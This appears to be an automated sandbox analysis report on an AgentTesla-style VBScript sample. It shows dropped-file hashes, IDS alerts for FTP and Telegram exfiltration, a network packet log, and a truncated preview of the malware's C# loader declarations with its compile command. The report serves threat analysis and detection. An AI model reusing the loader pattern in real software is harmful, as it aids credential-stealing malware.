                                SSDEEP:24:JVSgTlR8ZhIZFbamwTJI1ro8kkcw+n1csrsIuY:JVlTlR8DIZFbLwTJI1rb/P+n1BrsIX
                                MD5:5CB0DD0B77A3DA8C76FA25C6482E90D5
                                SHA1:309AAF2851C84D34E8C8FC38B102721126D3E145
                                SHA-256:4A5B247BE5F2AD1BF7CB3E184F7F687B5D59C7DE795FD1EAF69B7B0E2F4F716E
                                SHA-512:F4842683F2B44C5FE29A03CAC23BCE6358F2FFF9A4CD1232319591CB3A48834C95DC07DA3159584DE2AED4F0EBE9A7A517ED4676D38DC63B35BA405D5FA7BD19
                                Malicious:false
                                Preview:.using System;using System.Runtime.InteropServices;public static class Tueiron1 {[DllImport("user32")]public static extern int DestroyCaret();[DllImport("gdi32")]public static extern int ScaleWindowExtEx(int Drift,int Ambula,int Baso,int iagtta,int Vejmat158,int Mcgr);[DllImport("kernel32")]public static extern int HeapSize(int Prop,int Adres,int Tortri);[DllImport("shell32.dll")]public static extern void DragFinish(int Omdr);[DllImport("winmm.dll")]public static extern int mixerGetDevCaps(int Nitr,int Fel,int Afs93);[DllImport("kernel32")]public static extern int LockResource(int Lei);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImport("ADVAPI32.DLL")]public static extern void MapGenericMask(int Brink,int Midts);[DllImport("kernel32")]public static extern IntPtr EnumSystemLocalesW(uint v1,int v2);[DllImport("kernel32")]public static extern int SetThreadAffinityMask(int Rebuil,int Semis);[DllImport("user32")]public static extern int Se
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                Category:dropped
                                Size (bytes):371
                                Entropy (8bit):5.263514527807254
                                Encrypted:false
                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fAzxs7+AEszICN23fyAn:p37Lvkmb6KmYWZE7V
                                MD5:5782379115A5C7704ACCE3E9383AF816
                                SHA1:60D28D5DDD965175CB39C6BB0DF5AC1A224BCEC0
                                SHA-256:7604F449D890B1488ACFB0DDACABA6E1E24A51097835E4B47A35B507657EBD7B
                                SHA-512:A5AC3636A13572513032E3AF1253FE244AD76950FD508A04C101E0C92C2A946B4E012E28D6805DA3AE41CDF131A6B03CA89A0ECD188AD2E47756CAAAD9D9FDA4
                                Malicious:true
                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.0.cs"
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):4096
                                Entropy (8bit):3.0750833499217003
                                Encrypted:false
                                SSDEEP:48:6VJk5TZxiz1MDgQzufTbFukMAx7551ul6a3eq:OIWz1MDgVfTSACsK
                                MD5:CA1B80C27B39A8FF11303A0A90CB8ACC
                                SHA1:3558A01472147CD4D7509DDEFA51F9E4F437172B
                                SHA-256:FFE5482B92E9206F567B6F96DB1FDE3117BE892D717769DF78197A52198486F6
                                SHA-512:1DE5FE8955B5DD27C311423AC59E184B8823353AAC34BF90A0F66EC0BEDFB39D82C210F589505D1A806FDF152DD69D0FDB5BE8EEAB36EA19A5A628C40B08ED73
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P.c...........!................^&... ...@....... ....................................@..................................&..W....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@&......H.......P ..............................................................BSJB............v4.0.30319......l...t...#~......@...#Strings.... .......#US.(.......#GUID...8...|...#Blob...........G.........%3............................................................0.).....f.....f.......................................... 7............ D............ U............ ^............ i............ y.$.......... ..).......... ..1.......... ..7.......... ..=.......... ..)...................
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                Category:modified
                                Size (bytes):866
                                Entropy (8bit):5.33012640290001
                                Encrypted:false
                                SSDEEP:12:xKqR37Lvkmb6KmYWZE7wKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:Aqd3ka6KmpE7wKax5DqBVKVrdFAMBJTH
                                MD5:419D835EDD086DBCD1FB8CAFE131A363
                                SHA1:F02C01889D4EB029501F2842FED63BEE75A32AAC
                                SHA-256:C95EF9EFF8E1F8076E9C103BD88E939445D3E45956155401AF076E08F81C1D24
                                SHA-512:D56124B2E20DF3848BBB3B15C3C30B3F6D7019312D5D6E07ADDA6A6741C66BEF5B96DB38727021864D1AF1EE243024BDFD8735BAA98EBDF3292A4CEA7195BFC7
                                Malicious:false
                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                File Type:MSVC .res
                                Category:dropped
                                Size (bytes):652
                                Entropy (8bit):3.101934875256757
                                Encrypted:false
                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryLAak7Ynqq2lPN5Dlq5J:+RI+ycuZhNpAakS2lPNnqX
                                MD5:1A68EE12BE04A630C8BF56D4F7473ED0
                                SHA1:ED9048C3B8B4013A63E612FF08CD59512E49A3FD
                                SHA-256:B37612CBD66EF7BDD73717ADB5C978216B44420DED73796AD570D0FE6DD8D24D
                                SHA-512:F03CD19608B470B8AF2154A212BC6A5E75AFB7C0C0975AE0E2A28A33BE0E721F60B0491FFDBC23568F9B5A2D9C2DC7E9E4A7850D9908C6AD437942AEAD83AFF5
                                Malicious:false
                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.j.5.c.t.f.z.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.j.5.c.t.f.z.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Nov 29 18:34:00 2022, 1st section name ".debug$S"
                                Category:dropped
                                Size (bytes):1332
                                Entropy (8bit):4.001985755678852
                                Encrypted:false
                                SSDEEP:24:H9zW9Y89G/8qH9QwKPfwI+ycuZhNpAakS2lPNnqS2d:xiG/8qFKPo1ul6a3eqSG
                                MD5:F4BF383029179F79AE0437C25B9B88AC
                                SHA1:51A35E88821784CBC14768F2F96D9A4AFD88DDB0
                                SHA-256:CD999401D357C7AB4F043A403294A91E994DA74376E032E0CD0A5F9DD8618A91
                                SHA-512:8973B94881E0E57C1D2868DFE1965988072C9796077DDE07E685F59F534CA60CC3F72C60859F40177EDC879EB0C55016CD43BA779A972C639E75FFD19FCDA68A
                                Malicious:false
                                Preview:L....P.c.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP...................h.....0.V..G>...........5.......C:\Users\user\AppData\Local\Temp\RES7743.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.j.5.c.t.f.z.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):30
                                Entropy (8bit):3.964735178725505
                                Encrypted:false
                                SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                MD5:9F754B47B351EF0FC32527B541420595
                                SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                Malicious:false
                                Preview:NordVPN directory not found!..
                                File type:ASCII text, with CRLF line terminators
                                Entropy (8bit):5.836608054626225
                                TrID:
                                  File name:SIEM_PO00938467648.vbs
                                  File size:350795
                                  MD5:633811bccf3fe62978ce41a04b653083
                                  SHA1:bc81307b5c229094617e7cb8cdcaec55eaddad36
                                  SHA256:b5e4225737f935940fa23989440d5ea2c123c8affde25d6d7224e2b4abab5608
                                  SHA512:ade8c018c14b2c9de5df6c9c82130c309fd85084137d6e919c42b6fe7abb5ffde356f2d951f33ec3355df88f7134d51f66121afa3c7ca9f7bac047e0b73d0fa7
                                  SSDEEP:6144:J8YNxYPOwuvNR5vwfZKU2fU/5Mhc1gXcSGN+DieVwzjb6HZIKK:uijvPFWNEClgsSgpeVf6KK
                                  TLSH:AB74AE5DDA28DACD4F4E2F4ADC821A47C4654623D02614F9EEB5CB8E11C2ECDCE293D8
                                  File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
                                  Icon Hash:e8d69ece869a9ec4
                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  192.168.11.20185.31.121.13649858212029927 11/29/22-18:34:46.981738TCP2029927ET TROJAN AgentTesla Exfil via FTP4985821192.168.11.20185.31.121.136
                                  192.168.11.20185.31.121.13649859597722851779 11/29/22-18:34:47.016884TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4985959772192.168.11.20185.31.121.136
                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 29, 2022 18:34:32.485622883 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.643971920 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.644260883 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.644968033 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.803817987 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.811785936 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.811892033 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.811969995 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812026024 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812066078 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812089920 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812160969 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812189102 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812239885 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812350035 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812367916 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812485933 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812511921 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812616110 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812714100 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812730074 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812760115 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812860012 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812885046 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.813046932 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.972552061 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972625971 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972683907 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972731113 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.972739935 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972795963 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972850084 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972904921 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972935915 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.972959995 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972985983 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973016024 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973071098 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973079920 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973128080 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973129988 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973186970 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973242044 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973279953 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973279953 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973297119 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973351002 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973404884 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973449945 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973450899 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973458052 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973512888 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973567009 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973622084 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973622084 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973622084 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973680973 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973787069 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.132894039 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133204937 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133220911 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133277893 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133336067 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133358955 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133390903 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133446932 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133482933 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133502960 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133537054 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133558989 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133598089 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133615017 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133670092 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133670092 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133724928 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133779049 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133816004 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133836031 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133863926 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133893013 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133940935 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133949041 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134004116 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134027004 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134131908 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134130955 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134191990 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134228945 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134293079 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134320974 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134391069 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134413004 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134505033 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134548903 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134601116 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134617090 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134665012 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134697914 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134793997 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134891033 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134897947 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134943962 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134982109 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135040998 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135051012 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.135096073 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135152102 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135210037 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135243893 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.135243893 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.135267019 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135322094 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135375977 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135412931 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.135412931 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.135431051 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135487080 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135540962 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135586023 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.135586977 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.135596037 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135651112 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135694027 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.135705948 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135742903 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.135761976 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.135848045 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.135910988 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.296611071 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.296694040 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.296761990 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.296818972 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.296874046 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.296927929 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.296982050 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297039986 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297087908 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.297096014 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297152042 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297208071 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297255039 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.297262907 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297324896 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297334909 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.297380924 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297384977 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.297437906 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297493935 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297496080 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.297549963 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297568083 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.297605991 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297660112 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297709942 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.297715902 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297760010 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.297771931 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297827959 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297830105 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.297883034 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297938108 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.297955036 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.297991991 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298034906 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.298048019 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298101902 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298104048 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.298156977 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298161030 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.298213005 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298266888 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298300028 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.298321962 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298377037 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298427105 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.298430920 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298428059 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.298486948 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298542976 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298597097 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298605919 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.298607111 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.298650980 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298706055 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298758030 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.298760891 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298818111 CET8049855162.240.62.179192.168.11.20
